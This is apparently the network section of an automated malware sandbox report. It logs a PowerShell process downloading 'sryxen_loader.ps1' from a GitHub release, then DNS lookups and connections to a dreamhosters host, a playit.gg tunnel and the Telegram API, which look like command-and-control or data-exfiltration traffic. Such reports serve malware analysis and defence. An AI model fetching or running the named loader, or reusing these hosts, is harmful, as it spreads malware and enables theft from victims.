                                                                            Dec 3, 2024 15:27:16.286766052 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.286822081 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:16.286834002 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.286874056 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:16.293049097 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.293066025 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.293137074 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:16.293144941 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.293188095 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:16.298780918 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.298799038 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.298876047 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:16.298882961 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.298923016 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:16.458498001 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.458534002 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.458599091 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:16.458627939 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.458655119 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:16.458669901 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:16.464200974 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.464221001 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.464267015 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:16.464284897 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.464297056 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:16.464318991 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:16.470251083 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.470268965 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.470334053 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:16.470355034 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.474060059 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:16.475720882 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.475739002 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.475805998 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:16.475811958 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.476080894 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:16.481960058 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.481977940 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.482045889 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:16.482070923 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.486032963 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:16.488006115 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.488023043 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.488082886 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:16.488090038 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.488322973 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:16.494102001 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.494118929 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.494277000 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:16.494283915 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.494359016 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:16.500046015 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.500062943 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.500116110 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:16.500123024 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.500148058 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:16.500159979 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:16.661320925 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.661360025 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.661412954 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:16.661423922 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.661457062 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:16.661469936 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:16.665625095 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.665648937 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.665688038 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:16.665693998 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.665729046 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:16.665738106 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:16.671636105 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.671662092 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.671710968 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:16.671715975 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.671753883 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:16.671770096 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:16.677268982 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.677289963 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.677342892 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:16.677351952 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.677390099 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:16.677405119 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:16.683473110 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.683492899 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.683547974 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:16.683553934 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.683578968 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:16.683598995 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:16.689594984 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.689615011 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.689663887 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:16.689671040 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.689692020 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:16.689706087 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:16.695497990 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.695518017 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.695687056 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:16.695692062 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.698031902 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:16.701468945 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.701492071 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.701546907 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:16.701551914 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.702027082 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:16.861484051 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.861525059 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.861735106 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:16.861751080 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.861800909 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:16.867021084 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.867047071 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.867115021 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:16.867121935 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.868451118 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:16.873061895 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.873091936 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.873136997 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:16.873142958 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.873177052 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:16.873200893 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:16.879251003 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.879275084 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.879336119 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:16.879342079 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.880084038 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:16.884780884 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.884802103 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.884855032 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:16.884861946 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.884886026 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:16.884907961 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:16.891026020 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.891045094 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.891105890 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:16.891133070 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.894036055 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:16.897062063 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.897080898 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.897141933 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:16.897150993 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.898050070 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:16.902868986 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.902885914 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.902950048 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:16.902956009 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:16.906053066 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:17.062897921 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:17.062933922 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:17.063123941 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:17.063149929 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:17.063204050 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:17.068979025 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:17.069009066 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:17.069071054 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:17.069078922 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:17.069209099 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:17.074354887 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:17.074376106 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:17.074450016 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:17.074456930 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:17.074508905 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:17.079910040 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:17.079929113 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:17.080001116 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:17.080008030 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:17.080092907 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:17.086599112 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:17.086616993 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:17.086679935 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:17.086688042 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:17.086772919 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:17.092861891 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:17.092880964 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:17.093003035 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:17.093008995 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:17.093125105 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:17.098300934 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:17.098318100 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:17.098373890 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:17.098381042 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:17.098407984 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:17.098422050 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:17.104865074 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:17.104890108 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:17.104943991 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:17.104952097 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:17.105010986 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:17.263860941 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:17.263901949 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:17.263938904 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:17.263957024 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:17.263973951 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:17.264005899 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:17.270133018 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:17.270158052 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:17.270204067 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:17.270224094 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:17.270236015 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:17.270610094 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:17.274641991 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:17.274688959 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:17.274717093 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:17.274722099 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:17.274736881 CET44349707185.199.109.133192.168.2.5
                                                                            Dec 3, 2024 15:27:17.274739981 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:17.274759054 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:17.274790049 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:17.275110006 CET49707443192.168.2.5185.199.109.133
                                                                            Dec 3, 2024 15:27:26.254669905 CET49756443192.168.2.5107.180.236.211
                                                                            Dec 3, 2024 15:27:26.254724026 CET44349756107.180.236.211192.168.2.5
                                                                            Dec 3, 2024 15:27:26.254877090 CET49756443192.168.2.5107.180.236.211
                                                                            Dec 3, 2024 15:27:26.255053997 CET49756443192.168.2.5107.180.236.211
                                                                            Dec 3, 2024 15:27:26.255069017 CET44349756107.180.236.211192.168.2.5
                                                                            Dec 3, 2024 15:27:27.580478907 CET44349756107.180.236.211192.168.2.5
                                                                            Dec 3, 2024 15:27:27.580676079 CET49756443192.168.2.5107.180.236.211
                                                                            Dec 3, 2024 15:27:27.580708027 CET44349756107.180.236.211192.168.2.5
                                                                            Dec 3, 2024 15:27:27.580776930 CET49756443192.168.2.5107.180.236.211
                                                                            Dec 3, 2024 15:27:27.580782890 CET44349756107.180.236.211192.168.2.5
                                                                            Dec 3, 2024 15:27:27.581892967 CET44349756107.180.236.211192.168.2.5
                                                                            Dec 3, 2024 15:27:27.581976891 CET49756443192.168.2.5107.180.236.211
                                                                            Dec 3, 2024 15:27:27.592926979 CET49756443192.168.2.5107.180.236.211
                                                                            Dec 3, 2024 15:27:27.593064070 CET44349756107.180.236.211192.168.2.5
                                                                            Dec 3, 2024 15:27:27.593127012 CET49756443192.168.2.5107.180.236.211
                                                                            Dec 3, 2024 15:27:27.639337063 CET44349756107.180.236.211192.168.2.5
                                                                            Dec 3, 2024 15:27:27.640175104 CET49756443192.168.2.5107.180.236.211
                                                                            Dec 3, 2024 15:27:27.640203953 CET44349756107.180.236.211192.168.2.5
                                                                            Dec 3, 2024 15:27:27.687840939 CET49756443192.168.2.5107.180.236.211
                                                                            Dec 3, 2024 15:27:28.149228096 CET44349756107.180.236.211192.168.2.5
                                                                            Dec 3, 2024 15:27:28.149313927 CET44349756107.180.236.211192.168.2.5
                                                                            Dec 3, 2024 15:27:28.149981976 CET49756443192.168.2.5107.180.236.211
                                                                            Dec 3, 2024 15:27:28.385227919 CET49756443192.168.2.5107.180.236.211
                                                                            Dec 3, 2024 15:27:35.006584883 CET4977814254192.168.2.5147.185.221.24
                                                                            Dec 3, 2024 15:27:35.126799107 CET1425449778147.185.221.24192.168.2.5
                                                                            Dec 3, 2024 15:27:35.126899958 CET4977814254192.168.2.5147.185.221.24
                                                                            Dec 3, 2024 15:27:35.127692938 CET4977814254192.168.2.5147.185.221.24
                                                                            Dec 3, 2024 15:27:35.247904062 CET1425449778147.185.221.24192.168.2.5
                                                                            Dec 3, 2024 15:27:35.247941017 CET1425449778147.185.221.24192.168.2.5
                                                                            Dec 3, 2024 15:27:50.253839970 CET4977814254192.168.2.5147.185.221.24
                                                                            Dec 3, 2024 15:27:50.376729012 CET1425449778147.185.221.24192.168.2.5
                                                                            Dec 3, 2024 15:27:57.060036898 CET1425449778147.185.221.24192.168.2.5
                                                                            Dec 3, 2024 15:27:57.060211897 CET4977814254192.168.2.5147.185.221.24
                                                                            Dec 3, 2024 15:27:57.060317993 CET4977814254192.168.2.5147.185.221.24
                                                                            Dec 3, 2024 15:27:57.180370092 CET1425449778147.185.221.24192.168.2.5
                                                                            Dec 3, 2024 15:27:57.202632904 CET49828443192.168.2.5149.154.167.220
                                                                            Dec 3, 2024 15:27:57.202697992 CET44349828149.154.167.220192.168.2.5
                                                                            Dec 3, 2024 15:27:57.202769041 CET49828443192.168.2.5149.154.167.220
                                                                            Dec 3, 2024 15:27:57.203587055 CET49828443192.168.2.5149.154.167.220
                                                                            Dec 3, 2024 15:27:57.203602076 CET44349828149.154.167.220192.168.2.5
                                                                            Dec 3, 2024 15:27:58.849687099 CET44349828149.154.167.220192.168.2.5
                                                                            Dec 3, 2024 15:27:58.850047112 CET49828443192.168.2.5149.154.167.220
                                                                            Dec 3, 2024 15:27:58.850080013 CET44349828149.154.167.220192.168.2.5
                                                                            Dec 3, 2024 15:27:58.850178003 CET49828443192.168.2.5149.154.167.220
                                                                            Dec 3, 2024 15:27:58.850183010 CET44349828149.154.167.220192.168.2.5
                                                                            Dec 3, 2024 15:27:58.851181030 CET44349828149.154.167.220192.168.2.5
                                                                            Dec 3, 2024 15:27:58.851247072 CET49828443192.168.2.5149.154.167.220
                                                                            Dec 3, 2024 15:27:58.897671938 CET49828443192.168.2.5149.154.167.220
                                                                            Dec 3, 2024 15:27:58.897867918 CET49828443192.168.2.5149.154.167.220
                                                                            Dec 3, 2024 15:27:58.897882938 CET44349828149.154.167.220192.168.2.5
                                                                            Dec 3, 2024 15:27:58.897897005 CET49828443192.168.2.5149.154.167.220
                                                                            Dec 3, 2024 15:27:58.897970915 CET44349828149.154.167.220192.168.2.5
                                                                            Dec 3, 2024 15:27:58.945144892 CET49828443192.168.2.5149.154.167.220
                                                                            Dec 3, 2024 15:27:58.945180893 CET44349828149.154.167.220192.168.2.5
                                                                            Dec 3, 2024 15:27:58.992942095 CET49828443192.168.2.5149.154.167.220
                                                                            Dec 3, 2024 15:28:00.193094969 CET44349828149.154.167.220192.168.2.5
                                                                            Dec 3, 2024 15:28:00.193188906 CET44349828149.154.167.220192.168.2.5
                                                                            Dec 3, 2024 15:28:00.193275928 CET49828443192.168.2.5149.154.167.220
                                                                            Dec 3, 2024 15:28:00.193377018 CET49828443192.168.2.5149.154.167.220
                                                                            Dec 3, 2024 15:28:00.193396091 CET44349828149.154.167.220192.168.2.5
                                                                            Dec 3, 2024 15:28:00.193409920 CET49828443192.168.2.5149.154.167.220

                                                                            UDP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Dec 3, 2024 15:26:52.618659019 CET5559353192.168.2.51.1.1.1
                                                                            Dec 3, 2024 15:26:52.758440018 CET53555931.1.1.1192.168.2.5
                                                                            Dec 3, 2024 15:26:55.366667032 CET5716353192.168.2.51.1.1.1
                                                                            Dec 3, 2024 15:26:55.504733086 CET53571631.1.1.1192.168.2.5
                                                                            Dec 3, 2024 15:27:25.701580048 CET6242553192.168.2.51.1.1.1
                                                                            Dec 3, 2024 15:27:26.253669024 CET53624251.1.1.1192.168.2.5
                                                                            Dec 3, 2024 15:27:34.741859913 CET5285553192.168.2.51.1.1.1
                                                                            Dec 3, 2024 15:27:35.003226042 CET53528551.1.1.1192.168.2.5
                                                                            Dec 3, 2024 15:27:57.063329935 CET5778453192.168.2.51.1.1.1
                                                                            Dec 3, 2024 15:27:57.201792955 CET53577841.1.1.1192.168.2.5

                                                                            DNS Queries

                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                            Dec 3, 2024 15:26:52.618659019 CET192.168.2.51.1.1.10x2605Standard query (0)github.comA (IP address)IN (0x0001)false
                                                                            Dec 3, 2024 15:26:55.366667032 CET192.168.2.51.1.1.10xd724Standard query (0)objects.githubusercontent.comA (IP address)IN (0x0001)false
                                                                            Dec 3, 2024 15:27:25.701580048 CET192.168.2.51.1.1.10x7273Standard query (0)sigma.dreamhosters.comA (IP address)IN (0x0001)false
                                                                            Dec 3, 2024 15:27:34.741859913 CET192.168.2.51.1.1.10x6244Standard query (0)saw-worse.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                                            Dec 3, 2024 15:27:57.063329935 CET192.168.2.51.1.1.10x8e67Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                            DNS Answers

                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                            Dec 3, 2024 15:26:52.758440018 CET1.1.1.1192.168.2.50x2605No error (0)github.com20.233.83.145A (IP address)IN (0x0001)false
                                                                            Dec 3, 2024 15:26:55.504733086 CET1.1.1.1192.168.2.50xd724No error (0)objects.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                            Dec 3, 2024 15:26:55.504733086 CET1.1.1.1192.168.2.50xd724No error (0)objects.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                            Dec 3, 2024 15:26:55.504733086 CET1.1.1.1192.168.2.50xd724No error (0)objects.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                            Dec 3, 2024 15:26:55.504733086 CET1.1.1.1192.168.2.50xd724No error (0)objects.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                            Dec 3, 2024 15:27:26.253669024 CET1.1.1.1192.168.2.50x7273No error (0)sigma.dreamhosters.com107.180.236.211A (IP address)IN (0x0001)false
                                                                            Dec 3, 2024 15:27:35.003226042 CET1.1.1.1192.168.2.50x6244No error (0)saw-worse.gl.at.ply.gg147.185.221.24A (IP address)IN (0x0001)false
                                                                            Dec 3, 2024 15:27:57.201792955 CET1.1.1.1192.168.2.50x8e67No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                            HTTP Request Dependency Graph

                                                                            • github.com
                                                                            • objects.githubusercontent.com
                                                                            • sigma.dreamhosters.com
                                                                            • api.telegram.org

                                                                            HTTPS Proxied Packets

                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.54970420.233.83.1454436112C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-03 14:26:54 UTC217OUTGET /EvilBytecode/Sryxen/releases/download/v1.0.0/sryxen_loader.ps1 HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                            Host: github.com
                                                                            Connection: Keep-Alive
                                                                            2024-12-03 14:26:55 UTC964INHTTP/1.1 302 Found
                                                                            Server: GitHub.com
                                                                            Date: Tue, 03 Dec 2024 14:26:54 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                            Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/884985882/df985353-b412-45be-a5df-5d50a4ddaf53?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20241203%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241203T142654Z&X-Amz-Expires=300&X-Amz-Signature=489e3c2eced019fad27973c10618a9efce0574e42ef117f630590362dbc09acf&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dsryxen_loader.ps1&response-content-type=application%2Foctet-stream
                                                                            Cache-Control: no-cache
                                                                            Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                            X-Frame-Options: deny
                                                                            X-Content-Type-Options: nosniff
                                                                            X-XSS-Protection: 0
                                                                            Referrer-Policy: no-referrer-when-downgrade
